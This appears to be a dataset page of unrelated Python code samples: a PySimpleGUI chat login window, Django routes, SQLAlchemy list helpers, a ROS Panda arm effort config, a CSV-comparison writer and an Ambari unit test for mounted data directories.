    """Show the client login window.

    Stores the chosen name, its encoded form, and the connection target in
    the module globals `client_name`, `client_name_encoded`, `host`, and
    `port`; exits the process on window close.
    """
    global logo
    logo=base64files.static_logo
    global client_name_encoded
    global client_name
    global host
    global port
    layout = [[sg.Image(data=logo,size=(400,400))],[sg.Text('Enter your name, client.',justification='center',size=(50,1))],
              [sg.InputText("Client",size=(57,1), key="-clientname-")],
              [sg.Text("Host ",justification='center'), sg.InputText(key="-host-", size=(50,1))],
              [sg.Text("Port ",justification='center'), sg.InputText("2903",key="-port-",size=(51,1))],
              [sg.Submit(size=(50,1))]]
    sg.theme('Light Purple')
    window = sg.Window('easyChat', layout)
    event, values = window.read()
    if event == sg.WIN_CLOSED:
        exit()
    window.close(); del window
    # Defaults when fields are left empty: name "Client", LAN host, port 2903.
    client_name = values["-clientname-"] or "Client"
    client_name_encoded=client_name.encode()
    host=values["-host-"] or "192.168.1.5"
    port=int(values["-port-"] or 2903)
from django.urls import path
from . import views
urlpatterns = [
    # NOTE(review): route names look copy-pasted — 'test' is named
    # "loginUser" and 'deleteUser' maps to a view called FormatUser; confirm.
    path('register', views.UserRegistrationView.as_view(), name = "registerUser"),
    # path('login', views.Userlogin.as_view(), name = "loginUser"),
    path('deleteUser', views.FormatUser.as_view(), name = "formatuser"),
    path('test', views.Testing.as_view(), name = "loginUser"),
]
|
from modules.database.models.ot_list_t import List
from modules.database.base import Session
def find_lists_by_board_id(board_id):
    """Return a query of List rows belonging to the given board.

    NOTE(review): the session is never closed here — presumably kept open so
    the returned query can be lazily iterated by the caller; confirm.
    """
    session = Session()
    result = session.query(List).filter_by(board_id=board_id)
    return result
def add_list(li):
    """
    Persist a new List row.

    :param li: List instance to insert.
    :return: (status_code, id) — 201 on success, 409 on failure — or None
             when li is not a List.
    """
    if not isinstance(li, List):
        return
    status_code = 201
    session = Session()
    try:
        session.add(li)
        # Commit inside the try so a failed flush is caught below; the
        # original committed in `finally`, i.e. even after a rollback.
        session.commit()
    except Exception:
        session.rollback()
        status_code = 409
    id = li.id
    session.close()
    return status_code, id
def update_list(li):
    """
    Update the name of an existing List row.

    :param li: List instance carrying the target id and the new name.
    :return: (status_code, id) — 200 on success, 409 on failure — or None
             when li is not a List or has no id.
    """
    if not isinstance(li, List) or li.id is None:
        return
    status_code = 200
    session = Session()
    try:
        old_list = session.query(List).filter_by(id=li.id).first()
        # Raises AttributeError (-> 409) when no row matches li.id.
        old_list.name = li.name
        # Commit inside the try; the original committed in `finally`,
        # i.e. even after a rollback.
        session.commit()
    except Exception:
        session.rollback()
        status_code = 409
    id = li.id
    session.close()
    return status_code, id
|
#!/usr/bin/env python3
# NOTE: Config for changing the joint efforts.
PACKAGE = "panda_gazebo"
from dynamic_reconfigure.parameter_generator_catkin import (ParameterGenerator,
double_t)
gen = ParameterGenerator()
# Generate arm effort control parameters (levels 0-6, one per joint).
# add(name, type, level, description, default, min, max).
arm = gen.add_group("arm")
arm.add("joint1_effort", double_t, 0, "Joint 1 effort control command", 0, -87.0, 87.0)
arm.add("joint2_effort", double_t, 1, "Joint 2 effort control command", 0, -87.0, 87.0)
arm.add("joint3_effort", double_t, 2, "Joint 3 effort control command", 0, -87.0, 87.0)
arm.add("joint4_effort", double_t, 3, "Joint 4 effort control command", 0, -87.0, 87.0)
# Wrist joints (5-7) have a lower effort limit than the proximal joints.
arm.add("joint5_effort", double_t, 4, "Joint 5 effort control command", 0, -12.0, 12.0)
arm.add("joint6_effort", double_t, 5, "Joint 6 effort control command", 0, -12.0, 12.0)
arm.add("joint7_effort", double_t, 6, "Joint 7 effort control command", 0, -12.0, 12.0)
# Generate hand effort control parameters.
hand = gen.add_group("hand")
hand.add(
    "width",
    double_t,
    7,
    "Gripper width",
    0,      # default
    0.0,    # min
    0.08,   # max
)
hand.add(
    "speed",
    double_t,
    8,
    "Gripper speed",
    0.2,    # default
    0.0,    # min
    0.2,    # max
)
# Generate the necessary files and exit the program.
exit(gen.generate(PACKAGE, "panda_test", "JointEffort"))
|
from csv_comparison_package import Compare
from csv_comparison_package import Field
from csv_comparison_package import header_validator
from csv_comparison_package.decorator import call_each
from csv_comparison_package import data_exporter
@call_each
def write_duplicate_column_name(comparable: Compare):
    """Write the duplicate header names found in `comparable` into row 2 of
    the master worksheet, one per column, starting at
    `comparable.duplicate_column_start`."""
    start_column = comparable.duplicate_column_start
    duplicate_headers = header_validator.get_duplicate_column_name(comparable)
    for offset, header in enumerate(duplicate_headers):
        cell_format = data_exporter.select_format_left_or_bottom(comparable, offset)
        Compare.worksheet_master.write(2, start_column + offset,
                                       header[Field.column_name.value],
                                       cell_format)
|
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ambari_agent import main
main.MEMORY_LEAK_DEBUG_FILEPATH = "/tmp/memory_leak_debug.out"
import os
import logging
from unittest import TestCase
from mock.mock import Mock, MagicMock, patch
from resource_management.libraries.functions import mounted_dirs_helper
from resource_management.core.logger import Logger
from resource_management.core.exceptions import Fail
from resource_management import Directory
from resource_management.libraries.script.script import Script
class StubParams(object):
  """
  Dummy params object: attribute access params.x reads params.dict["x"].
  """
  def __init__(self):
    self.dict = {}

  def __getattr__(self, name):
    # Only called for attributes not found normally; proxy to the dict.
    return self.dict[name]

  def __repr__(self):
    cls_name = self.__class__.__name__
    # Exclude dunder members from the listing.
    public = [attr for attr in set(dir(self)) if not str(attr).startswith("__")]
    return "<StubParams: {0}; mocks: {1}>".format(cls_name, str(public))
def fake_create_dir(directory):
  """
  Fake function used as a function pointer for handle_mounted_dirs.

  Fixed: uses the print(...) call form, which parses under both Python 2
  (parenthesized expression) and Python 3, instead of the py2-only
  print statement.
  """
  print("Fake function to create directory {0}".format(directory))
@patch.object(Script, "get_config", new=MagicMock(return_value={'configurations':{'cluster-env': {'ignore_bad_mounts': False, 'manage_dirs_on_root': True, 'one_dir_per_partition': False}}}))
class TestDatanodeHelper(TestCase):
  """
  Test the functionality of the dfs_datanode_helper.py
  """
  logger = logging.getLogger('TestDatanodeHelper')

  # Three data dirs shared by the tests below.
  grid0 = "/grid/0/data"
  grid1 = "/grid/1/data"
  grid2 = "/grid/2/data"

  # Shared params stub: the three data dirs plus the mount-history file.
  params = StubParams()
  params.data_dir_mount_file = "/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist"
  params.dfs_data_dir = "{0},{1},{2}".format(grid0, grid1, grid2)
  params.hdfs_user = "hdfs_test"
  params.user_group = "hadoop_test"

  @patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
  @patch.object(Logger, "warning")
  @patch.object(Logger, "info")
  @patch.object(Logger, "error")
  def test_normalized(self, log_error, log_info, warning_info, dir_mock):
    """
    Test that the data dirs are normalized by removing leading and trailing whitespace, and case sensitive.
    """
    params = StubParams()
    params.data_dir_mount_file = "/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist"
    params.dfs_data_dir = "/grid/0/data , /grid/1/data ,/GRID/2/Data/"
    # Function under test
    mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, params.dfs_data_dir, params.data_dir_mount_file, update_cache=False)
    # print(...) form parses under both Python 2 and 3.
    for (name, args, kwargs) in log_info.mock_calls:
      print(args[0])
    for (name, args, kwargs) in log_error.mock_calls:
      print(args[0])
    log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /grid/0/data")
    log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /grid/1/data")
    log_info.assert_any_call("Forcefully ensuring existence and permissions of the directory: /GRID/2/Data/")
    self.assertEquals(0, log_error.call_count)

  @patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
  @patch.object(Logger, "info")
  @patch.object(Logger, "warning")
  @patch.object(Logger, "error")
  @patch.object(mounted_dirs_helper, "get_dir_to_mount_from_file")
  @patch.object(mounted_dirs_helper, "get_mount_point_for_dir")
  @patch.object(os.path, "isdir")
  @patch.object(os.path, "exists")
  def test_grid_becomes_unmounted(self, mock_os_exists, mock_os_isdir, mock_get_mount_point,
                                  mock_get_data_dir_to_mount_from_file, log_error, log_warning, log_info, dir_mock):
    """
    Test when grid2 becomes unmounted
    """
    mock_os_exists.return_value = True  # Indicate that history file exists
    # Initially, all grids were mounted
    mock_get_data_dir_to_mount_from_file.return_value = {self.grid0: "/dev0", self.grid1: "/dev1", self.grid2: "/dev2"}
    # Grid2 then becomes unmounted (its mount point falls back to /).
    mock_get_mount_point.side_effect = ["/dev0", "/dev1", "/"] * 2
    mock_os_isdir.side_effect = [False, False, False] + [True, True, True]
    # Function under test
    mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, self.params.dfs_data_dir, self.params.data_dir_mount_file, update_cache=False)
    for (name, args, kwargs) in log_info.mock_calls:
      print(args[0])
    error_logs = []
    for (name, args, kwargs) in log_error.mock_calls:
      error_logs.append(args[0])  # this is a one-tuple
    error_msg = "".join(error_logs)
    self.assertEquals(1, log_error.call_count)
    self.assertTrue("Directory /grid/2/data became unmounted from /dev2 . Current mount point: / ."
                    " Please ensure that mounts are healthy. If the mount change was intentional, you can update the contents of "
                    "/var/lib/ambari-agent/data/datanode/dfs_data_dir_mount.hist." in error_msg)

  @patch("resource_management.libraries.functions.mounted_dirs_helper.Directory")
  @patch.object(Logger, "info")
  @patch.object(Logger, "warning")
  @patch.object(Logger, "error")
  @patch.object(mounted_dirs_helper, "get_dir_to_mount_from_file")
  @patch.object(mounted_dirs_helper, "get_mount_point_for_dir")
  @patch.object(os.path, "isdir")
  @patch.object(os.path, "exists")
  def test_grid_becomes_remounted(self, mock_os_exists, mock_os_isdir, mock_get_mount_point,
                                  mock_get_data_dir_to_mount_from_file, log_error, log_warning, log_info, dir_mock):
    """
    Test when grid2 becomes remounted
    """
    mock_os_exists.return_value = True  # Indicate that history file exists
    # Initially, all grids were mounted
    mock_get_data_dir_to_mount_from_file.return_value = {self.grid0: "/dev0", self.grid1: "/dev1", self.grid2: "/"}
    # Grid2 then becomes remounted
    mock_get_mount_point.side_effect = ["/dev0", "/dev1", "/dev2"] * 2
    mock_os_isdir.side_effect = [False, False, False] + [True, True, True]
    # Function under test
    # FIX: the second argument used to be self.params.data_dir_mount_file
    # (copy-pasted from the history-file argument), so the data dirs were
    # never actually exercised; pass dfs_data_dir as in the test above.
    mounted_dirs_helper.handle_mounted_dirs(fake_create_dir, self.params.dfs_data_dir, self.params.data_dir_mount_file, update_cache=False)
    for (name, args, kwargs) in log_info.mock_calls:
      print(args[0])
    for (name, args, kwargs) in log_error.mock_calls:
      print(args[0])
    self.assertEquals(0, log_error.call_count)

  def test_get_mounts_with_multiple_data_dirs(self):
    # No mount hosts more than one data dir -> empty result.
    self.assertEquals([], mounted_dirs_helper.get_mounts_with_multiple_data_dirs(["/", "/hodoop", "/tmp"], "/hadoop/data,/tmp"))
    # Both data dirs land on the root mount.
    self.assertEquals([("/", ["/hadoop/data", "/tmp"])], mounted_dirs_helper.get_mounts_with_multiple_data_dirs(["/"], "/hadoop/data,/tmp"))

  def test_may_manage_folder(self):
    # root, no history file, manage_dirs_on_root = True
    # folder should be managed
    dirs_unmounted=set()
    self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = True, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set())

    # root, no history file, manage_dirs_on_root = False
    # folder should not be managed
    dirs_unmounted=set()
    self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set(['/grid/0/data']))

    # non root, no history file, manage_dirs_on_root = False
    # folder should be managed
    dirs_unmounted=set()
    self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir=None, is_non_root_dir=True, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set())

    # unmounted to root, manage_dirs_on_root = True
    # folder should not be managed
    dirs_unmounted=set()
    self.assertEquals(False, mounted_dirs_helper._may_manage_folder('/grid/0/data', '/grid/0', True, dirs_unmounted, [], False, '/'))
    self.assertEquals(dirs_unmounted, set(['/grid/0/data']))

    # unmounted to root, manage_dirs_on_root = False
    # folder should not be managed
    dirs_unmounted=set()
    self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/grid/0/data', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set(['/grid/0/data']))

    # same mount = root, manage_dirs_on_root = False
    # folder should not be managed
    dirs_unmounted=set()
    self.assertEquals(False, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = False, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set())

    # same mount = root, manage_dirs_on_root = True
    # folder should be managed
    dirs_unmounted=set()
    self.assertEquals(True, mounted_dirs_helper._may_manage_folder(dir_='/grid/0/data', last_mount_point_for_dir='/', is_non_root_dir=False, dirs_unmounted=dirs_unmounted, error_messages = [], manage_dirs_on_root = True, curr_mount_point = '/'))
    self.assertEquals(dirs_unmounted, set())

    # mount changed to non root, manage_dirs_on_root = False
    # folder should not be managed
    dirs_unmounted=set()
    self.assertEquals(False, mounted_dirs_helper._may_manage_folder('/grid/0/data', '/', True, dirs_unmounted, [], False, '/grid/0'))
    self.assertEquals(dirs_unmounted, set(['/grid/0/data']))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.